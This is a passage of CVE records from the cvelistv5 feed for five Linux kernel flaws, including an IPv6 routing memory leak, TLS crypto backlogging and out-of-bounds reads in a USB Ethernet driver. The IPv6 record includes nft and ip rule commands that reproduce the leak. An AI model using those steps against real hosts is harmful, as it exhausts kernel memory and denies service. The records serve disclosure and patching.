"dateReserved": "2024-07-16T11:38:08.896Z",
"dateUpdated": "2025-05-04T08:23:31.768Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-47546 (GCVE-0-2021-47546)
Vulnerability from cvelistv5
Published
2024-05-24 15:09
Modified
2025-05-04 12:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ipv6: fix memory leak in fib6_rule_suppress
The kernel leaks memory when a `fib` rule is present in IPv6 nftables
firewall rules and a suppress_prefix rule is present in the IPv6 routing
rules (used by certain tools such as wg-quick). In such scenarios, every
incoming packet will leak an allocation in `ip6_dst_cache` slab cache.
After some hours of `bpftrace`-ing and source code reading, I tracked
down the issue to ca7a03c41753 ("ipv6: do not free rt if
FIB_LOOKUP_NOREF is set on suppress rule").
The problem with that change is that the generic `args->flags` always have
`FIB_LOOKUP_NOREF` set[1][2] but the IPv6-specific flag
`RT6_LOOKUP_F_DST_NOREF` might not be, leading to `fib6_rule_suppress` not
decreasing the refcount when needed.
How to reproduce:
- Add the following nftables rule to a prerouting chain:
meta nfproto ipv6 fib saddr . mark . iif oif missing drop
This can be done with:
sudo nft create table inet test
sudo nft create chain inet test test_chain '{ type filter hook prerouting priority filter + 10; policy accept; }'
sudo nft add rule inet test test_chain meta nfproto ipv6 fib saddr . mark . iif oif missing drop
- Run:
sudo ip -6 rule add table main suppress_prefixlength 0
- Watch `sudo slabtop -o | grep ip6_dst_cache` to see memory usage increase
with every incoming ipv6 packet.
This patch exposes the protocol-specific flags to the protocol
specific `suppress` function, and check the protocol-specific `flags`
argument for RT6_LOOKUP_F_DST_NOREF instead of the generic
FIB_LOOKUP_NOREF when decreasing the refcount, like this.
[1]: https://github.com/torvalds/linux/blob/ca7a03c4175366a92cee0ccc4fec0038c3266e26/net/ipv6/fib6_rules.c#L71
[2]: https://github.com/torvalds/linux/blob/ca7a03c4175366a92cee0ccc4fec0038c3266e26/net/ipv6/fib6_rules.c#L99
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ca7a03c4175366a92cee0ccc4fec0038c3266e26 Version: ca7a03c4175366a92cee0ccc4fec0038c3266e26 Version: ca7a03c4175366a92cee0ccc4fec0038c3266e26 Version: ca7a03c4175366a92cee0ccc4fec0038c3266e26 Version: d37c966752043733eb847dd897d6e3405084c559 Version: ecc265624956ea784cb2bd2b31a95bd54c4f5f13 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47546",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:34:31.593424Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:34:48.850Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:39:59.755Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee38eb8cf9a7323884c2b8e0adbbeb2192d31e29"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/209d35ee34e25f9668c404350a1c86d914c54ffa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ef8a76a340ebdb2c2eea3f6fb0ebbed09a16383"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cdef485217d30382f3bf6448c54b4401648fe3f1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/fib_rules.h",
"net/core/fib_rules.c",
"net/ipv4/fib_rules.c",
"net/ipv6/fib6_rules.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ee38eb8cf9a7323884c2b8e0adbbeb2192d31e29",
"status": "affected",
"version": "ca7a03c4175366a92cee0ccc4fec0038c3266e26",
"versionType": "git"
},
{
"lessThan": "209d35ee34e25f9668c404350a1c86d914c54ffa",
"status": "affected",
"version": "ca7a03c4175366a92cee0ccc4fec0038c3266e26",
"versionType": "git"
},
{
"lessThan": "8ef8a76a340ebdb2c2eea3f6fb0ebbed09a16383",
"status": "affected",
"version": "ca7a03c4175366a92cee0ccc4fec0038c3266e26",
"versionType": "git"
},
{
"lessThan": "cdef485217d30382f3bf6448c54b4401648fe3f1",
"status": "affected",
"version": "ca7a03c4175366a92cee0ccc4fec0038c3266e26",
"versionType": "git"
},
{
"status": "affected",
"version": "d37c966752043733eb847dd897d6e3405084c559",
"versionType": "git"
},
{
"status": "affected",
"version": "ecc265624956ea784cb2bd2b31a95bd54c4f5f13",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/fib_rules.h",
"net/core/fib_rules.c",
"net/ipv4/fib_rules.c",
"net/ipv6/fib6_rules.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.16",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.164",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.84",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.7",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.2.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix memory leak in fib6_rule_suppress\n\nThe kernel leaks memory when a `fib` rule is present in IPv6 nftables\nfirewall rules and a suppress_prefix rule is present in the IPv6 routing\nrules (used by certain tools such as wg-quick). In such scenarios, every\nincoming packet will leak an allocation in `ip6_dst_cache` slab cache.\n\nAfter some hours of `bpftrace`-ing and source code reading, I tracked\ndown the issue to ca7a03c41753 (\"ipv6: do not free rt if\nFIB_LOOKUP_NOREF is set on suppress rule\").\n\nThe problem with that change is that the generic `args-\u003eflags` always have\n`FIB_LOOKUP_NOREF` set[1][2] but the IPv6-specific flag\n`RT6_LOOKUP_F_DST_NOREF` might not be, leading to `fib6_rule_suppress` not\ndecreasing the refcount when needed.\n\nHow to reproduce:\n - Add the following nftables rule to a prerouting chain:\n meta nfproto ipv6 fib saddr . mark . iif oif missing drop\n This can be done with:\n sudo nft create table inet test\n sudo nft create chain inet test test_chain \u0027{ type filter hook prerouting priority filter + 10; policy accept; }\u0027\n sudo nft add rule inet test test_chain meta nfproto ipv6 fib saddr . mark . iif oif missing drop\n - Run:\n sudo ip -6 rule add table main suppress_prefixlength 0\n - Watch `sudo slabtop -o | grep ip6_dst_cache` to see memory usage increase\n with every incoming ipv6 packet.\n\nThis patch exposes the protocol-specific flags to the protocol\nspecific `suppress` function, and check the protocol-specific `flags`\nargument for RT6_LOOKUP_F_DST_NOREF instead of the generic\nFIB_LOOKUP_NOREF when decreasing the refcount, like this.\n\n[1]: https://github.com/torvalds/linux/blob/ca7a03c4175366a92cee0ccc4fec0038c3266e26/net/ipv6/fib6_rules.c#L71\n[2]: https://github.com/torvalds/linux/blob/ca7a03c4175366a92cee0ccc4fec0038c3266e26/net/ipv6/fib6_rules.c#L99"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:41:40.471Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ee38eb8cf9a7323884c2b8e0adbbeb2192d31e29"
},
{
"url": "https://git.kernel.org/stable/c/209d35ee34e25f9668c404350a1c86d914c54ffa"
},
{
"url": "https://git.kernel.org/stable/c/8ef8a76a340ebdb2c2eea3f6fb0ebbed09a16383"
},
{
"url": "https://git.kernel.org/stable/c/cdef485217d30382f3bf6448c54b4401648fe3f1"
}
],
"title": "ipv6: fix memory leak in fib6_rule_suppress",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-47546",
"datePublished": "2024-05-24T15:09:51.286Z",
"dateReserved": "2024-05-24T15:02:54.829Z",
"dateUpdated": "2025-05-04T12:41:40.471Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26584 (GCVE-0-2024-26584)
Vulnerability from cvelistv5
Published
2024-02-21 14:59
Modified
2025-05-04 08:51
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: tls: handle backlogging of crypto requests
Since we're setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our
requests to the crypto API, crypto_aead_{encrypt,decrypt} can return
-EBUSY instead of -EINPROGRESS in valid situations. For example, when
the cryptd queue for AESNI is full (easy to trigger with an
artificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued
to the backlog but still processed. In that case, the async callback
will also be called twice: first with err == -EINPROGRESS, which it
seems we can just ignore, then with err == 0.
Compared to Sabrina's original patch this version uses the new
tls_*crypt_async_wait() helpers and converts the EBUSY to
EINPROGRESS to avoid having to modify all the error handling
paths. The handling is identical.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26584",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-26T17:14:36.035758Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:03.401Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.862Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ade391adc584f17b5570fd205de3ad029090368"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cd1bbca03f3c1d845ce274c0d0a66de8e5929f72"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/tls/tls_sw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3ade391adc584f17b5570fd205de3ad029090368",
"status": "affected",
"version": "a54667f6728c2714a400f3c884727da74b6d1717",
"versionType": "git"
},
{
"lessThan": "cd1bbca03f3c1d845ce274c0d0a66de8e5929f72",
"status": "affected",
"version": "a54667f6728c2714a400f3c884727da74b6d1717",
"versionType": "git"
},
{
"lessThan": "13eca403876bbea3716e82cdfe6f1e6febb38754",
"status": "affected",
"version": "a54667f6728c2714a400f3c884727da74b6d1717",
"versionType": "git"
},
{
"lessThan": "ab6397f072e5097f267abf5cb08a8004e6b17694",
"status": "affected",
"version": "a54667f6728c2714a400f3c884727da74b6d1717",
"versionType": "git"
},
{
"lessThan": "8590541473188741055d27b955db0777569438e3",
"status": "affected",
"version": "a54667f6728c2714a400f3c884727da74b6d1717",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/tls/tls_sw.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.160",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: tls: handle backlogging of crypto requests\n\nSince we\u0027re setting the CRYPTO_TFM_REQ_MAY_BACKLOG flag on our\nrequests to the crypto API, crypto_aead_{encrypt,decrypt} can return\n -EBUSY instead of -EINPROGRESS in valid situations. For example, when\nthe cryptd queue for AESNI is full (easy to trigger with an\nartificially low cryptd.cryptd_max_cpu_qlen), requests will be enqueued\nto the backlog but still processed. In that case, the async callback\nwill also be called twice: first with err == -EINPROGRESS, which it\nseems we can just ignore, then with err == 0.\n\nCompared to Sabrina\u0027s original patch this version uses the new\ntls_*crypt_async_wait() helpers and converts the EBUSY to\nEINPROGRESS to avoid having to modify all the error handling\npaths. The handling is identical."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:51:35.535Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3ade391adc584f17b5570fd205de3ad029090368"
},
{
"url": "https://git.kernel.org/stable/c/cd1bbca03f3c1d845ce274c0d0a66de8e5929f72"
},
{
"url": "https://git.kernel.org/stable/c/13eca403876bbea3716e82cdfe6f1e6febb38754"
},
{
"url": "https://git.kernel.org/stable/c/ab6397f072e5097f267abf5cb08a8004e6b17694"
},
{
"url": "https://git.kernel.org/stable/c/8590541473188741055d27b955db0777569438e3"
}
],
"title": "net: tls: handle backlogging of crypto requests",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26584",
"datePublished": "2024-02-21T14:59:12.452Z",
"dateReserved": "2024-02-19T14:20:24.125Z",
"dateUpdated": "2025-05-04T08:51:35.535Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-2964 (GCVE-0-2022-2964)
Vulnerability from cvelistv5
Published
2022-09-09 00:00
Modified
2024-08-03 00:53
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A flaw was found in the Linux kernel’s driver for the ASIX AX88179_178A-based USB 2.0/3.0 Gigabit Ethernet Devices. The vulnerability contains multiple out-of-bounds reads and possible out-of-bounds writes.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:53:00.491Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067482"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230113-0001/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "kernel 5.17"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in the Linux kernel\u2019s driver for the ASIX AX88179_178A-based USB 2.0/3.0 Gigabit Ethernet Devices. The vulnerability contains multiple out-of-bounds reads and possible out-of-bounds writes."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-119",
"description": "CWE-119",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-01-13T00:00:00",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067482"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230113-0001/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2022-2964",
"datePublished": "2022-09-09T00:00:00",
"dateReserved": "2022-08-23T00:00:00",
"dateUpdated": "2024-08-03T00:53:00.491Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42237 (GCVE-0-2024-42237)
Vulnerability from cvelistv5
Published
2024-08-07 15:14
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firmware: cs_dsp: Validate payload length before processing block
Move the payload length check in cs_dsp_load() and cs_dsp_coeff_load()
to be done before the block is processed.
The check that the length of a block payload does not exceed the number
of remaining bytes in the firwmware file buffer was being done near the
end of the loop iteration. However, some code before that check used the
length field without validating it.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42237",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:00.898679Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:32.028Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "259955eca9b7acf1299b1ac077d8cfbe12df35d8",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "3a9cd924aec1288d675df721f244da4dd7e16cff",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "71d9e313d8f7e18c543a9c80506fe6b1eb1fe0c8",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
},
{
"lessThan": "6598afa9320b6ab13041616950ca5f8f938c0cf1",
"status": "affected",
"version": "f6bc909e7673c30abcbdb329e7d0aa2e83c103d7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/cirrus/cs_dsp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.16"
},
{
"lessThan": "5.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "5.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirmware: cs_dsp: Validate payload length before processing block\n\nMove the payload length check in cs_dsp_load() and cs_dsp_coeff_load()\nto be done before the block is processed.\n\nThe check that the length of a block payload does not exceed the number\nof remaining bytes in the firwmware file buffer was being done near the\nend of the loop iteration. However, some code before that check used the\nlength field without validating it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:48.143Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/259955eca9b7acf1299b1ac077d8cfbe12df35d8"
},
{
"url": "https://git.kernel.org/stable/c/3a9cd924aec1288d675df721f244da4dd7e16cff"
},
{
"url": "https://git.kernel.org/stable/c/71d9e313d8f7e18c543a9c80506fe6b1eb1fe0c8"
},
{
"url": "https://git.kernel.org/stable/c/6598afa9320b6ab13041616950ca5f8f938c0cf1"
}
],
"title": "firmware: cs_dsp: Validate payload length before processing block",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42237",
"datePublished": "2024-08-07T15:14:26.221Z",
"dateReserved": "2024-07-30T07:40:12.253Z",
"dateUpdated": "2025-05-04T09:24:48.143Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43854 (GCVE-0-2024-43854)
Vulnerability from cvelistv5
Published
2024-08-17 09:22
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
block: initialize integrity buffer to zero before writing it to media
Metadata added by bio_integrity_prep is using plain kmalloc, which leads
to random kernel memory being written media. For PI metadata this is
limited to the app tag that isn't used by kernel generated metadata,
but for non-PI metadata the entire buffer leaks kernel memory.
Fix this by adding the __GFP_ZERO flag to allocations for writes.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b Version: 7ba1ba12eeef0aa7113beb16410ef8b7c748e18b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43854",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:14.517245Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:20.780Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/bio-integrity.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9f4af4cf08f9a0329ade3d938f55d2220c40d0a6",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
},
{
"lessThan": "129f95948a96105c1fad8e612c9097763e88ac5f",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
},
{
"lessThan": "3fd11fe4f20756b4c0847f755a64cd96f8c6a005",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
},
{
"lessThan": "cf6b45ea7a8df0f61bded1dc4a8561ac6ad143d2",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
},
{
"lessThan": "d418313bd8f55c079a7da12651951b489a638ac1",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
},
{
"lessThan": "23a19655fb56f241e592041156dfb1c6d04da644",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
},
{
"lessThan": "ebc0e91ba76dc6544fff9f5b66408b1982806a00",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
},
{
"lessThan": "899ee2c3829c5ac14bfc7d3c4a5846c0b709b78f",
"status": "affected",
"version": "7ba1ba12eeef0aa7113beb16410ef8b7c748e18b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/bio-integrity.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.27"
},
{
"lessThan": "2.6.27",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.322",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.284",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.226",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.322",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
